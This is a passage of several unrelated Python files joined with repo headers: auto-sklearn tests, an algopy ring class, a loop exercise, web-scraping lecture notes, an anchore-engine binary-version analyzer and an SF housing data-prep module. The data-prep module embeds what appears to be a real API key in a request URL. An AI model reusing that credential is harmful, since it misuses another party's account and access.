X_train, Y_train, X_test, Y_test = putil.get_dataset('iris')
automl = autosklearn.automl.AutoML(
backend=backend_api,
time_left_for_this_task=20,
per_run_time_limit=5,
metric=metric,
)
with unittest.mock.patch(
'autosklearn.ensemble_builder.EnsembleBuilder.run'
) as mock_ensemble_run:
mock_ensemble_run.side_effect = MemoryError
automl.fit(
X_train, Y_train, task=MULTICLASS_CLASSIFICATION,
)
# A memory error occurs in the ensemble construction
self.assertIsNone(automl._backend.load_ensemble(automl._seed))
            # Model loading is robust to this and loads the best individual model
automl._load_models()
self.assertIsNotNone(automl.ensemble_)
# Just 1 model is there for ensemble and all weight must be on it
get_models_with_weights = automl.get_models_with_weights()
self.assertEqual(len(get_models_with_weights), 1)
self.assertEqual(get_models_with_weights[0][0], 1.0)
# Match a toy dataset
if metric._sign < 0:
self.assertLessEqual(automl.score(X_test, Y_test), 0.2)
else:
self.assertGreaterEqual(automl.score(X_test, Y_test), 0.8)
del automl
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
def test_fail_if_feat_type_on_pandas_input(self):
"""We do not support feat type when pandas
is provided as an input
"""
backend_api = self._create_backend('test_fail_feat_pandas')
automl = autosklearn.automl.AutoML(
backend=backend_api,
time_left_for_this_task=20,
per_run_time_limit=5,
metric=accuracy,
)
X_train = pd.DataFrame({'a': [1, 1], 'c': [1, 2]})
y_train = [1, 0]
with self.assertRaisesRegex(ValueError,
"feat_type cannot be provided when using pandas"):
automl.fit(
X_train, y_train,
task=BINARY_CLASSIFICATION,
feat_type=['Categorical', 'Numerical'],
)
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
def test_fail_if_dtype_changes_automl(self):
"""We do not support changes in the input type.
        Once an estimator is fitted, it should not change the data type
"""
backend_api = self._create_backend('test_fail_feat_typechange')
automl = autosklearn.automl.AutoML(
backend=backend_api,
time_left_for_this_task=20,
per_run_time_limit=5,
metric=accuracy,
)
X_train = pd.DataFrame({'a': [1, 1], 'c': [1, 2]})
y_train = [1, 0]
automl.InputValidator.validate(X_train, y_train, is_classification=True)
with self.assertRaisesRegex(ValueError,
"Auto-sklearn previously received features of type"):
automl.fit(
X_train.to_numpy(), y_train,
task=BINARY_CLASSIFICATION,
)
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
if __name__ == "__main__":
unittest.main()
# ==== File: algopy/base_type.py | Repo: arthus701/algopy | License: Unlicense ====
"""
This implements an abstract base class, Ring.
Rationale:
Goal is to separate the datatype specification from the algorithms and containers for the following reasons:
1) It allows one to use the algorithms directly *without* overhead. E.g. calling mul(z.data, x.data, y.data)
has much less overhead than z = x.__mul__(y). data is to be kept as close as possible to
machine primitives. E.g. data is array or tuple of arrays.
2) Potential reuse of an algorithm in several datatypes.
3) Relatively easy to connect high performance algorithms with a very highlevel abstract description.
For instance, most programming languages allow calling C-functions. Therefore, the algorithms
should be given as void fcn(int A, double B, ...)
For instance, the datatype is a truncated Taylor polynomial R[t]/<t^D> of the class Foo.
The underlying container is a simple array of doubles.
"""
import numpy
class Ring(object):
"""
An abstract base class in an attempt to follow the DRY principle.
It implements the algebraic class of a ring as defined on
http://en.wikipedia.org/wiki/Ring_%28mathematics%29
The idea is that the set is described in data and the operations +,* etc.
are implemented as functions that operate on the data.
E.g. the factor ring of natural numbers modulo 4, x.data = 3 y.data = 2
then z = add(x,y) is implemented as
def add(x,y):
            return self.__class__((x.data + y.data) % 4)
and one obtains z.data = 1
Warning:
Since this class is only of little value it may be deprecated in the future.
"""
data = NotImplementedError()
def totype(self, x):
"""
tries to convert x to an object of the class
works for : scalar x, numpy.ndarray x
Remark:
        at the moment, a scalar x is expanded as a Ring with the same degree as self.
The reason is a missing implementation that works for graded rings of different degree.
Once such implementations exist, this function should be adapted.
"""
if numpy.isscalar(x):
xdata = self.__class__.__zeros_like__(self.data)
self.__class__.__scalar_to_data__(xdata, x)
return self.__class__(xdata)
elif isinstance(x, numpy.ndarray):
raise NotImplementedError('sorry, not implemented just yet')
elif not isinstance(x, self.__class__):
            raise NotImplementedError('Cannot convert x\n type(x) = %s but expected type(x) = %s' % (str(type(x)), str(self.__class__)))
else:
return x
def __add__(self, rhs):
rhs = self.totype(rhs)
retval = self.__class__(self.__class__.__zeros_like__(self.data))
self.__class__.add(retval.data, self.data, rhs.data)
return retval
def __sub__(self, rhs):
rhs = self.totype(rhs)
retval = self.__class__(self.__class__.__zeros_like__(self.data))
self.__class__.sub(retval.data, self.data, rhs.data)
return retval
def __mul__(self,rhs):
rhs = self.totype(rhs)
retval = self.__class__(self.__class__.__zeros_like__(self.data))
self.__class__.mul(retval.data, self.data, rhs.data)
return retval
def __truediv__(self,rhs):
rhs = self.totype(rhs)
retval = self.__class__(self.__class__.__zeros_like__(self.data))
self.__class__.div(retval.data, self.data, rhs.data)
return retval
def __radd__(self, lhs):
return self + lhs
def __rmul__(self, lhs):
return self * lhs
def zeros_like(self):
return self.__class__(self.__class__.__zeros_like__(self.data))
def __str__(self):
return str(self.data)
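# Minimal usage sketch (hypothetical subclass, not part of algopy itself): the factor
# ring Z/4Z from the class docstring, assuming subclasses provide add/sub/mul hooks
# with the (out_data, x_data, y_data) signature used by the operators above.
class ZMod4(Ring):
    def __init__(self, data):
        self.data = data  # a one-element list, so the in-place updates above work

    @classmethod
    def __zeros_like__(cls, data):
        return [0]

    @classmethod
    def __scalar_to_data__(cls, xdata, x):
        xdata[0] = int(x) % 4

    @classmethod
    def add(cls, out, x, y):
        out[0] = (x[0] + y[0]) % 4

    @classmethod
    def sub(cls, out, x, y):
        out[0] = (x[0] - y[0]) % 4

    @classmethod
    def mul(cls, out, x, y):
        out[0] = (x[0] * y[0]) % 4

# (ZMod4([3]) + ZMod4([2])).data == [1] and (ZMod4([3]) * ZMod4([2])).data == [2]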
# ==== File: estrutura-repeticao-while/ex062.py | Repo: TacilioRodriguez/Python | License: Unlicense ====
"""
Improve Challenge 061 by asking the user whether they want to show a few more terms.
The program ends when the user says they want to show 0 terms.
"""
primeiro = int(input('Digite o termo: '))
razao = int(input('Digite a razão: '))
termo = primeiro
cont = 1
total = 0
mais = 10
while mais != 0:
total = total + mais
while cont <= total:
print('{} -> '.format(termo), end=' ')
termo = termo + razao
cont = cont + 1
print('Pausa')
mais = int(input('Quantos termos você quer mostrar a mais? '))
print('FIM')
# ==== File: Udemy_PythonBootcamp/Sec15_WebScraping.py | Repo: gonzalosc2/LearningPython | License: MIT ====
####################################
# author: Gonzalo Salazar
# course: 2020 Complete Python Bootcamps: From Zero to Hero in Python
# purpose: lecture notes
# description: Section 15 - Web Scraping
# other: N/A
####################################
# RULES
# 1. always try to get permission before scraping, otherwise I might be blocked
# 2. check the laws of whatever country we are operating in (for legal issues)
# LIMITATIONS
# each website is unique -> so for each website there must exist a Python script
# an update to a website might brake my script
import requests
import bs4
# Grabbing a title
result = requests.get("http://example.com")
type(result)
result.text
# bs with lxml tranforms the previous raw html into the following
soup = bs4.BeautifulSoup(result.text,'lxml')
soup
# returns the tag we specified as a list (i.e., there might be more than one)
soup.select('title')
soup.select('title')[0].getText()
soup.select('p')
site_paragraphs = soup.select('p')
type(site_paragraphs[0]) # not a string; instead it is a specialized bs4 object,
# which is why we can do something like call .getText()
# Grabbing a class (from CSS) using soup.select()
# 'div' : all elements with 'div' tag
# '#some_id' : elements containing id='some_id'
# '.some_class' : elements containing class='some_class'
# 'div span' : any element named span within a div element
# 'div > span' : any element named span directly within a div element, with
# nothing in between
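# Quick illustration of the selector forms listed above, on a tiny in-memory page
# (made-up HTML, not part of the course material):
demo_html = '<div id="intro" class="lead"><span>hello</span><p><span>nested</span></p></div>'
demo_soup = bs4.BeautifulSoup(demo_html, 'lxml')
demo_soup.select('div')         # every <div> element
demo_soup.select('#intro')      # the element with id="intro"
demo_soup.select('.lead')       # elements with class="lead"
demo_soup.select('div span')    # both spans, at any depth inside the div
demo_soup.select('div > span')  # only the span that is a direct child of the div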
res = requests.get("https://en.wikipedia.org/wiki/Jonas_Salk")
soup = bs4.BeautifulSoup(res.text,'lxml')
soup.select('.toctext')[0].text
soup.select('.toctext')[0].getText()
for item in soup.select('.toctext'):
print(item.text)
# Grabbing an image
#soup.select('img') # can return more than what is needed (it will depend on
# the website)
soup.select('.thumbimage')
jonas_salk = soup.select('.thumbimage')[0]
jonas_salk['src'] # we can treat it as a dictionary
image_link = requests.get('http://upload.wikimedia.org/wikipedia/commons/thumb/3/3c/Roosevelt_OConnor.jpg/220px-Roosevelt_OConnor.jpg')
#image_link.content # raw content of the image which is a binary file
#make sure to use the same format that the image has
f = open('my_image_image.jpg','wb') # wb means write binary
f.write(image_link.content)
f.close()
# Multiple elements across multiple pages
# GOAL: get title of every book with a 2 star rating
#Check that this also works with page 1
#http://books.toscrape.com/catalogue/page-2.html
base_url = 'http://books.toscrape.com/catalogue/page-{}.html'
req = requests.get(base_url.format(1))
soup = bs4.BeautifulSoup(req.text,'lxml')
products = soup.select(".product_pod") # always check the length, in this case should be 20
example = products[0]
# one way (not useful every time)
'star-rating Two' in str(example)
# another way (checking for the presence of a class)
example.select('.star-rating.Three') # if there is a space in a class we should add a dot
example.select('.star-rating.Two') # nothing
example.select('a')[1]['title']
two_star_titles = []
for n in range(1,51):
scrape_url = base_url.format(n)
    req = requests.get(scrape_url)  # fetch page n
soup = bs4.BeautifulSoup(req.text,'lxml')
books = soup.select(".product_pod")
for book in books:
if len(book.select('.star-rating.Two')) != 0:
two_star_titles.append(book.select('a')[1]['title'])
two_star_titles
# ==== File: anchore_engine/analyzers/modules/33_binary_packages.py | Repo: dspalmer99/anchore-engine | License: Apache-2.0 ====
#!/usr/bin/env python3
import sys
import os
import re
import json
import traceback
import pkg_resources
import tarfile
from collections import OrderedDict
import anchore_engine.analyzers.utils, anchore_engine.utils
def get_python_evidence(tfl, member, memberhash, evidence):
global binary_package_el
fullpath = "/{}".format(member.name)
filename = os.path.basename(fullpath)
el = {}
el.update(binary_package_el)
patt_bin = re.match("^python([0-9]+\.[0-9]+)$", filename)
patt_lib = re.match("^libpython([0-9]+\.[0-9]+).so.*$", filename)
if (patt_bin or patt_lib) and member.isreg():
f_vers = ""
if patt_bin:
f_vers = patt_bin.group(1)
elif patt_lib:
f_vers = patt_lib.group(1)
with tfl.extractfile(member) as FH:
for line in FH.readlines():
subline = line
try:
the_re = ".*{}\.([0-9]+[-_a-zA-Z0-9]*).*".format(f_vers)
patt = re.match(anchore_engine.utils.ensure_bytes(the_re), subline)
if patt and f_vers:
b_vers = "{}.{}".format(f_vers, anchore_engine.utils.ensure_str(patt.group(1)))
if b_vers.startswith(f_vers):
el['name'] = 'python'
el['version'] = b_vers
el['location'] = fullpath
evidence['python']['binary'].append( el )
break
except Exception as err:
raise err
elif filename == "patchlevel.h" and member.isreg():
with tfl.extractfile(member) as FH:
for line in FH.readlines():
line = line.strip()
patt = re.match(b".*#define +PY_VERSION +\"*([0-9\.\-_a-zA-Z]+)\"*", line)
if patt:
h_vers = anchore_engine.utils.ensure_str(patt.group(1))
el['name'] = 'python'
el['version'] = h_vers
el['location'] = fullpath
evidence['python']['devel'].append(el)
break
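# Small offline illustration of the regex-based version sniffing used above; the
# sample byte string is made up, real evidence comes from files in the squashed tar.
def _example_python_version_match(f_vers=b"3.8", line=b"...Python 3.8.10 (default)..."):
    patt = re.match(b".*" + re.escape(f_vers) + rb"\.([0-9]+[-_a-zA-Z0-9]*).*", line)
    return None if patt is None else (f_vers + b"." + patt.group(1)).decode()
# _example_python_version_match() -> '3.8.10'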
def get_golang_evidence(tfl, member, memberhash, evidence):
global binary_package_el
fullpath = "/{}".format(member.name)
filename = os.path.basename(fullpath)
el = {}
el.update(binary_package_el)
if filename in ['go'] and member.isreg():
with tfl.extractfile(member) as FH:
for line in FH.readlines():
subline = line
try:
the_re = ".*go([0-9]+\.[0-9]+(\.[0-9]+|beta[0-9]+|alpha[0-9]+|rc[0-9]+)*).*"
patt = re.match(anchore_engine.utils.ensure_bytes(the_re), subline)
if patt:
vers = anchore_engine.utils.ensure_str(patt.group(1))
el['name'] = 'go'
el['version'] = vers
el['location'] = fullpath
evidence['go']['binary'].append( el )
break
except Exception as err:
raise err
elif filename == "VERSION" and member.isreg():
with tfl.extractfile(member) as FH:
for line in FH.readlines():
line = line.strip()
patt = re.match(b".*go([0-9]+\.[0-9]+(\.[0-9]+|beta[0-9]+|alpha[0-9]+|rc[0-9]+)*).*", line)
if patt:
vers = anchore_engine.utils.ensure_str(patt.group(1))
final_loc = fullpath
if memberhash.get(os.path.join(os.path.dirname(member.name), 'bin', 'go'), None):
final_loc = os.path.join("/", os.path.dirname(member.name), 'bin', 'go')
el['name'] = 'go'
el['version'] = vers
el['location'] = final_loc
evidence['go']['devel'].append( el )
break
def get_busybox_evidence(tfl, member, memberhash, distrodict, evidence):
global binary_package_el
fullpath = "/{}".format(member.name)
filename = os.path.basename(fullpath)
if filename == "busybox" and (member.isreg() or member.islnk()):
# Perform any specific checks using prior metadata
if distrodict.get('flavor', "") == 'BUSYB':
patt = re.match(".*([0-9]+\.[0-9]+\.[0-9]+).*", distrodict.get('fullversion', ""))
if patt:
version = anchore_engine.utils.ensure_str(patt.group(1))
el = {}
el.update(binary_package_el)
el['name'] = 'busybox'
el['version'] = version
el['location'] = fullpath
evidence['busybox']['binary'].append(el)
analyzer_name = "package_list"
try:
config = anchore_engine.analyzers.utils.init_analyzer_cmdline(sys.argv, analyzer_name)
except Exception as err:
print(str(err))
sys.exit(1)
imgname = config['imgid']
imgid = config['imgid_full']
outputdir = config['dirs']['outputdir']
unpackdir = config['dirs']['unpackdir']
squashtar = os.path.join(unpackdir, "squashed.tar")
resultlist = {}
version_found_map = {}
binary_package_el = {
'name': None,
'version': None,
'location': None,
'type': 'binary',
'files': [],
'license': 'N/A',
'origin': 'N/A',
'metadata': json.dumps({})
}
try:
allfiles = {}
if os.path.exists(unpackdir + "/anchore_allfiles.json"):
with open(unpackdir + "/anchore_allfiles.json", 'r') as FH:
allfiles = json.loads(FH.read())
else:
fmap, allfiles = anchore_engine.analyzers.utils.get_files_from_squashtar(os.path.join(unpackdir, "squashed.tar"))
with open(unpackdir + "/anchore_allfiles.json", 'w') as OFH:
OFH.write(json.dumps(allfiles))
# read in previous analyzer output for helping to increase accuracy of findings
fname = os.path.join(outputdir, 'pkgfiles.all')
pkgfilesall = anchore_engine.analyzers.utils.read_kvfile_todict(fname)
meta = anchore_engine.analyzers.utils.get_distro_from_squashtar(os.path.join(unpackdir, "squashed.tar"), unpackdir=unpackdir)
distrodict = anchore_engine.analyzers.utils.get_distro_flavor(meta['DISTRO'], meta['DISTROVERS'], likedistro=meta['LIKEDISTRO'])
# set up ordered dictionary structure for the runtimes and evidence types
evidence = OrderedDict()
for runtime in ['python', 'go', 'busybox']:
evidence[runtime] = OrderedDict()
for etype in ['binary', 'devel']:
evidence[runtime][etype] = []
# Perform a per file routine to evaluate files for gathering binary package version evidence
with tarfile.open(os.path.join(unpackdir, "squashed.tar"), mode='r', format=tarfile.PAX_FORMAT) as tfl:
alltnames = tfl.getnames()
alltfiles = {}
for name in alltnames:
alltfiles[name] = True
memberhash = anchore_engine.analyzers.utils.get_memberhash(tfl)
for member in list(memberhash.values()):
try:
get_python_evidence(tfl, member, memberhash, evidence)
except Exception as err:
print ("WARN: caught exception evaluating file ({}) for python runtime evidence: {}".format(member.name, str(err)))
try:
get_golang_evidence(tfl, member, memberhash, evidence)
except Exception as err:
print ("WARN: caught exception evaluating file ({}) for golang runtime evidence: {}".format(member.name, str(err)))
try:
get_busybox_evidence(tfl, member, memberhash, distrodict, evidence)
except Exception as err:
print ("WARN: caught exception evaluating file ({}) for busybox runtime evidence: {}".format(member.name, str(err)))
resultlist = {}
for runtime in evidence.keys(): #['python', 'go']:
for e in evidence[runtime].keys(): #['binary', 'devel']:
for t in evidence[runtime][e]:
version = t.get('version')
location = t.get('location')
if location in pkgfilesall:
print ("INFO: Skipping evidence {} - file is owned by OS package".format(location))
else:
key = "{}-{}".format(runtime, version)
if key not in version_found_map:
result = {}
result.update(binary_package_el)
result.update(t)
result['metadata'] = json.dumps({"evidence_type": e})
resultlist[location] = json.dumps(result)
version_found_map[key] = True
try:
squashtar = os.path.join(unpackdir, "squashed.tar")
hints = anchore_engine.analyzers.utils.get_hintsfile(unpackdir, squashtar)
for pkg in hints.get('packages', []):
pkg_type = pkg.get('type', "").lower()
if pkg_type == 'binary':
try:
pkg_key, el = anchore_engine.analyzers.utils._hints_to_binary(pkg)
try:
resultlist[pkg_key] = json.dumps(el)
except Exception as err:
print ("WARN: unable to add binary package ({}) from hints - excpetion: {}".format(pkg_key, err))
except Exception as err:
print ("WARN: bad hints record encountered - exception: {}".format(err))
except Exception as err:
print ("WARN: problem honoring hints file - exception: {}".format(err))
except Exception as err:
import traceback
traceback.print_exc()
print("WARN: analyzer unable to complete - exception: " + str(err))
if resultlist:
ofile = os.path.join(outputdir, 'pkgs.binary')
anchore_engine.analyzers.utils.write_kvfile_fromdict(ofile, resultlist)
#print ("RESULT: {}".format(resultlist))
sys.exit(0)
# ==== File: SF-home-price-prediction/src/preparation.py | Repo: apthomas/SF-home-price-prediction | License: MIT ====
import pandas as pd
import numpy as np
import csv
import urllib.request
import json
from datetime import datetime
from datetime import timedelta
from sklearn.preprocessing import MinMaxScaler
import web_scrapers
import os
def load_real_estate_data(filename, state_attr, state):
df = pd.read_csv(filename, encoding="ISO-8859-1")
df = df.loc[df[state_attr] == state]
return df
def load_data(filenames):
df_list=[]
for i in range(0, len(filenames)):
df = pd.read_csv(filenames[i], encoding="ISO-8859-1")
df_list.append(df)
return df_list
def create_zipcode_list(filenames):
zipcodes = {} # structured with within 5, 10 miles from another zipcode
zip_list = []
for i in range(0, len(filenames)):
with open(filenames[i], 'r', encoding='utf-8-sig') as f:
reader = csv.reader(f)
your_list = list(reader)
for z in range(0, len(your_list)):
zipcodes[your_list[z][0]] = [], []
zip_list.append(your_list[z][0])
return zipcodes, zip_list
def wrangle_real_estate_data(df, zip_list, drop_columns):
df = df[df['RegionName'].isin(zip_list)]
df = df.drop(drop_columns, axis=1)
return df
def wrangle_IPO_data(df, zip_list):
df['Date Filed'] = pd.to_datetime(df['Date Filed'], format='%Y-%m-%d')
df['Lockup Expiration Date'] = pd.to_datetime(df['Lockup Expiration Date'], errors='coerce', format='%m/%d/%Y')
df = df[df['Zipcode'].isin(zip_list)]
df = df.drop(['Lockup Expiration Date'], axis=1)
df['Lockup Expiration Date'] = df['Date Filed'] + timedelta(days=180)
df = df[df['Date Filed']> df['Date Filed'].min()+ timedelta(days=366)]
return df
def wrangle_census_data(df_census_econ, df_census_dem, zip_list, census_econ_columns, census_dem_columns):
df_census_econ.rename(columns={'Id2': 'Zipcode'}, inplace=True)
df_census_econ.rename(
columns={'Percent; EMPLOYMENT STATUS - Civilian labor force - Unemployment Rate': 'Unemployment Rate'},
inplace=True)
df_census_econ.rename(columns={
'Percent; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - Less than $10,000': 'l10000'},
inplace=True)
df_census_econ.rename(columns={
'Percent; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - $10,000 to $14,999': 'l15000'},
inplace=True)
df_census_econ.rename(columns={
'Percent; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - $15,000 to $24,999': 'l25000'},
inplace=True)
df_census_econ.rename(columns={
'Estimate; COMMUTING TO WORK - Mean travel time to work (minutes)': 'Mean Travel Time to Work Estimate (minutes)'},
inplace=True)
df_census_econ.rename(columns={
'Percent; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - $200,000 or more': 'Percent of Households with Income Greater than $200,000'},
inplace=True)
df_census_econ.rename(columns={
'Estimate; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - Median household income (dollars)': 'Median Household Income Estimate (dollars)'},
inplace=True)
df_census_econ.rename(columns={
'Estimate; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - Mean household income (dollars)': 'Mean Household Income Estimate (dollars)'},
inplace=True)
df_census_econ.rename(columns={
'Estimate; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Per capita income (dollars)': 'Per Capita Income Estimate (dollars)'},
inplace=True)
df_census_econ.rename(columns={
'Percent; HEALTH INSURANCE COVERAGE - Civilian noninstitutionalized population - No health insurance coverage': 'Percent of Population with no Health Insurance Coverage'},
inplace=True)
df_census_econ.rename(columns={
'Percent; PERCENTAGE OF FAMILIES AND PEOPLE WHOSE INCOME IN THE PAST 12 MONTHS IS BELOW THE POVERTY LEVEL - All people': 'Percent of People whose Income in the Past 12 months has been Below Poverty Level'},
inplace=True)
df_census_econ['l10000'].replace("-", "0.0", regex=True, inplace=True)
df_census_econ['l10000'].replace("N", "0.0", regex=True, inplace=True)
df_census_econ['l10000'] = df_census_econ['l10000'].astype(float)
df_census_econ['l15000'].replace("-", "0.0", regex=True, inplace=True)
df_census_econ['l15000'].replace("N", "0.0", regex=True, inplace=True)
df_census_econ['l15000'] = df_census_econ['l15000'].astype(float)
df_census_econ['l25000'].replace("-", "0.0", regex=True, inplace=True)
df_census_econ['l25000'].replace("N", "0.0", regex=True, inplace=True)
df_census_econ['l25000'] = df_census_econ['l25000'].astype(float)
df_census_econ["Percent of Households With Income Less Than $24,999"] = df_census_econ['l10000'] + df_census_econ[
'l15000'] + df_census_econ['l25000']
df_census_econ = df_census_econ.filter(census_econ_columns)
df_census_dem.rename(columns={'Id2': 'Zipcode'}, inplace=True)
df_census_dem.rename(columns={'Estimate; SEX AND AGE - Median age (years)': 'Median Age'}, inplace=True)
df_census_dem.rename(columns={'Percent; SEX AND AGE - Under 18 years': 'Percent of People under 18 years of age'},
inplace=True)
df_census_dem.rename(columns={'Percent; SEX AND AGE - 65 years and over': 'Percent of People 65 years and over'},
inplace=True)
df_census_dem.rename(columns={'Percent; SEX AND AGE - 18 years and over - Male': 'Percent of Males'}, inplace=True)
df_census_dem.rename(columns={'Percent; SEX AND AGE - 18 years and over - Female': 'Percent of Females'},
inplace=True)
df_census_dem.rename(columns={
'Percent; HISPANIC OR LATINO AND RACE - Total population - Hispanic or Latino (of any race)': 'Percent of People who are Hispanic'},
inplace=True)
df_census_dem.rename(columns={
'Percent; HISPANIC OR LATINO AND RACE - Total population - Not Hispanic or Latino - White alone': 'Percent of People who are White'},
inplace=True)
df_census_dem.rename(columns={
'Percent; HISPANIC OR LATINO AND RACE - Total population - Not Hispanic or Latino - Black or African American alone': 'Percent of People who are Black or African American'},
inplace=True)
df_census_dem.rename(columns={
'Percent; HISPANIC OR LATINO AND RACE - Total population - Not Hispanic or Latino - Asian alone': 'Percent of People who are Asian'},
inplace=True)
df_census_dem = df_census_dem.filter(census_dem_columns)
# filter data to only Silicon Valley + San Francisco Zip Codes
df_census_dem = df_census_dem[df_census_dem['Zipcode'].isin(zip_list)]
df_census_econ = df_census_econ[df_census_econ['Zipcode'].isin(zip_list)]
return df_census_econ, df_census_dem
def wrangle_real_estate_headers(df):
'''
run before joining dataframes so keys match
df_sale_counts_by_zip_silicon_valley.columns = df_sale_counts_by_zip_silicon_valley.columns.str.replace('Sales Counts ', '')
df_sale_counts_by_zip_silicon_valley = df_sale_counts_by_zip_silicon_valley.add_prefix('Sales Counts ')
df_sale_counts_by_zip_silicon_valley.rename(columns = {'Sales Counts RegionName':'Zipcode'}, inplace=True)
'''
df.columns = df.columns.str.replace('All Homes ', '')
df = df.add_prefix('All Homes ')
df.rename(columns={'All Homes RegionName': 'Zipcode'}, inplace=True)
return df
def wrangle_ipo_headers(df):
df.rename(columns={'Ticker': 'Symbol'}, inplace=True)
df["Found"] = df["Found"].astype(dtype=np.int64)
return df
def join_data(df1, df2, key, join_type):
df = df1.set_index(key).merge(df2, on=key, how=join_type)
return df
def merge_data(df1, df2, key):
df = pd.merge(df1, df2, on=key, how='inner')
return df
def df_replace(df, replace_list):
for i in range(0, len(replace_list)):
df = df.replace([replace_list[i]], [''], regex=True)
return df
def drop_columns_and_nans(df, drop_columns, nan_columns):
df = df.drop(['IPO Name', 'Offer date', 'CUSIP', 'PERM'], axis=1)
for i in range(0, len(nan_columns)):
df.drop_duplicates(subset=nan_columns[i], keep='first', inplace=True)
return df
def calculate_distance_between_zips(zipcode, min_radius, max_radius):
# api-endpoint
URL_base = "https://api.zip-codes.com/ZipCodesAPI.svc/1.0/FindZipCodesInRadius?zipcode="
URL = URL_base + zipcode + '&minimumradius=' + min_radius + '&maximumradius=' + max_radius + '&key=UNBQ2435TAEYA5EIC8J6'
# sending get request and saving the response as response object
contents = urllib.request.urlopen(URL).read()
# printing the output
zipcodes_nearby = []
print(json.loads(contents))
for i in range(1, len(json.loads(contents)['DataList'])):
zipcodes_nearby.append(json.loads(contents)['DataList'][i]['Code'])
return zipcodes_nearby
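# Offline sketch of the parsing above with a mocked response (made-up zip codes; the
# real payload comes from the zip-codes.com API and is assumed to look like this):
def _parse_zipcodes_demo():
    mocked = {'DataList': [{'Code': '94105'}, {'Code': '94107'}, {'Code': '94110'}]}
    # element 0 appears to be the queried zip code itself, hence the loop starts at 1
    return [mocked['DataList'][i]['Code'] for i in range(1, len(mocked['DataList']))]
# _parse_zipcodes_demo() -> ['94107', '94110']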
def create_zipcode_distances_dictionary(zipcodes, zip_list):
'''
***DONT RUN IF THESE ARE ALREADY CREATED***
currently stored as data/processed/zipcodes_within_radius.txt
'''
print(len(zip_list))
for i in range(0, len(zip_list)):
zipcodes[zip_list[i]] = calculate_distance_between_zips(zip_list[i], '0', '5'), calculate_distance_between_zips(
zip_list[i], '5', '10')
return zipcodes
def create_text_file_from_dictionary(filename, dictionary):
'''
with open('data/processed/zipcodes_within_radius.txt', 'w') as json_file:
json.dump(zipcodes, json_file)
'''
with open(filename, 'w') as json_file:
json.dump(dictionary, json_file)
return dictionary
def export_dataframe_to_dictionary(df, name):
filename = 'data/processed/' + name + '.csv'
export_csv = df.to_csv(filename, index=True, header=True) # Don't forget to add '.csv' at the end of the path
def update_zipcodes_dict(zipcodes, zip_list):
exists = os.path.isfile('../data/processed/zipcodes_within_radius.txt')
if not exists:
zipcodes = create_zipcode_distances_dictionary(zipcodes, zip_list)
create_text_file_from_dictionary('../data/processed/zipcodes_within_radius.txt', zipcodes)
else:
zipcodes = {}
with open('../data/processed/zipcodes_within_radius.txt', 'r') as f:
zipcodes = json.load(f)
return zipcodes
def create_IPO_an_Zipcode_dataframe(census_econ_cols, census_dem_cols, df_ipo, df_zip, zipcodes):
if 'Zipcode' in census_econ_cols:
census_econ_cols.remove('Zipcode')
if 'Zipcode' in census_dem_cols:
census_dem_cols.remove('Zipcode')
ipo_header_list = list(df_ipo.columns.values) +census_dem_cols+census_econ_cols + ['All Homes Date Filed',
'All Homes Lockup Expiration Date',
'All Homes 1 Year Before Date Filed',
'All Homes 2 Years After Date Filed']
'''
Distance from IPO = estimate is .2 if in the same zipcode as IPO
= estimate is 0.5 if not in same zip code as IPO and less than 5 miles from zipcode to IPO
= estimate is 1 if greater than 5 and less than 10 miles from zipcode to IPO
'''
new_df_list = []
for index, row in df_ipo.iterrows():
ipo_zipcode = str(row['Zipcode'])
zipcode_row = df_zip.loc[df_zip['Zipcode'] == int(ipo_zipcode)]
headerList = join_IPO_and_Zip_Data(row['Date Filed'], row['Lockup Expiration Date'], census_econ_cols,census_dem_cols)
data = np.concatenate((np.array(row.values), zipcode_row.filter(headerList).values), axis=None)
dictionary = dict(zip(ipo_header_list, data))
dictionary['Symbol'] = index
dictionary['Distance to IPO'] = .2
dictionary['Zipcode for Distance'] = ipo_zipcode
new_df_list.append(dictionary)
within_5miles = zipcodes[ipo_zipcode][0]
within_10miles = zipcodes[ipo_zipcode][1]
for i in range(0, len(within_5miles)):
zipcode_row = df_zip.loc[df_zip['Zipcode'] == int(within_5miles[i])]
data = np.concatenate((np.array(row.values), zipcode_row.filter(headerList).values), axis=None)
dictionary = dict(zip(ipo_header_list, data))
dictionary['Symbol'] = index
dictionary['Distance to IPO'] = .5
dictionary['Zipcode for Distance'] = within_5miles[i]
new_df_list.append(dictionary)
for j in range(0, len(within_10miles)):
zipcode_row = df_zip.loc[df_zip['Zipcode'] == int(within_10miles[j])]
data = np.concatenate((np.array(row.values), zipcode_row.filter(headerList).values), axis=None)
dictionary = dict(zip(ipo_header_list, data))
dictionary['Symbol'] = index
dictionary['Distance to IPO'] = 1
dictionary['Zipcode for Distance'] = within_10miles[j]
new_df_list.append(dictionary)
ipo_final_df = pd.DataFrame(new_df_list)
ipo_final_df.dropna(subset=['Median Age'], how='all', inplace=True)
ipo_final_df.dropna(subset=['All Homes Date Filed'], how='all', inplace=True)
return ipo_final_df
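# Compact restatement of the distance weighting documented inside the function above
# (same thresholds, shown standalone for clarity; illustrative helper only):
def _distance_to_ipo_weight(ring):
    """ring is one of 'same_zip', 'within_5_miles', 'within_10_miles'."""
    return {'same_zip': 0.2, 'within_5_miles': 0.5, 'within_10_miles': 1.0}[ring]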
def normalize_IPO_an_Zipcode_dataframe(normalization_list, df_ipo):
df_ipo = df_ipo.replace(['--'], [''], regex=True)
df_ipo = df_ipo.replace(r'^\s*$', np.nan, regex=True)
df_ipo = df_ipo.replace(['\,'], [''], regex=True)
df_ipo = df_ipo.replace(['\+'], [''], regex=True)
scaler = MinMaxScaler()
df_ipo[normalization_list] = scaler.fit_transform(df_ipo[normalization_list])
return df_ipo
def join_IPO_and_Zip_Data(IPO_Date_Filed, IPO_Lockup_Expiration_Date, census_econ_cols, census_dem_cols):
filtered_columns = census_dem_cols +census_econ_cols # remove 'zipcode'
